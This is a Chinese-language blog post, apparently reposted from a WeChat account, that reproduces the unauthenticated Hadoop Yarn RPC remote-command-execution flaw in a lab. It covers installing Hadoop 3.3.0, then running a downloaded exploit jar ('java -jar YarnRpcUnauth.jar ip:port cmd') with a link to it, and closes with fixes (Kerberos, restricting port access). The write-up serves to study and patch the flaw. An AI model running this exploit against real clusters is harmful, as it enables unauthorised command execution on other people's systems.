Hadoop Yarn RPC RCE 复现

  • A+
所属分类:安全文章

工具下载地址 公众号回复 1125

Hadoop Yarn RPC RCE 复现



        Hadoop作为一个分布式计算应用框架,种类功能繁多,而Hadoop Yarn作为其核心组件之一,负责将资源分配至各个集群中运行各种应用程序,并调度不同集群节点上的任务执行。Hadoop Yarn RPC未授权访问使得攻击者无需认证即可通过RPC通信执行恶意命令。Hadoop Yarn RPC未授权访问漏洞存在于Hadoop Yarn中负责资源管理和任务调度的ResourceManager,成因是该组件为用户提供的RPC服务默认情况下无需认证即可访问。


下载环境地址:

https://downloads.apache.org/hadoop/common/hadoop-3.3.0/hadoop-3.3.0.tar.gz


tar-zxvf hadoop-3.3.0.tar.gz

 

配置java-home


vi etc/hadoop/hadoop-env.sh

// 修改为



export JAVA_HOME=/usr/local/jvm/java

设置主机允许无密码SSH链接



ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa       // 创建公钥私钥对cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys //chmod 0600 ~/.ssh/authorized_keys // 设置权限,owner有读写权限,group和other无权限


运行环境


sbin/start-all.sh


Hadoop Yarn RPC RCE 复现



找到启动的端口,本次实验环境是8042端口


Hadoop Yarn RPC RCE 复现




漏洞复现

 


java -jar YarnRpcUnauth.jar ip:port cmd


Hadoop Yarn RPC RCE 复现

Hadoop Yarn RPC RCE 复现


local logs可以查看到日志


Hadoop Yarn RPC RCE 复现


Hadoop Yarn RPC RCE 复现


https://github.com/0x0021h/expbox/blob/main/Hadoop%20Yarn%20RPC%20RCE.md


https://github.com/cckuailong/YarnRpcRCE/releases/download/0.0.1/YarnRpcUnauth.jar


修复建议

1. 建议启用Kerberos认证功能,以阻止未经授权的访问。

2. 如非必要,建议禁止外部地址访问Hadoop RPC服务相关端口;或配置为仅对可信地址开放。


参考链接

https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html

https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html#Configuration


原文始发于微信公众号(阿乐你好):Hadoop Yarn RPC RCE 复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: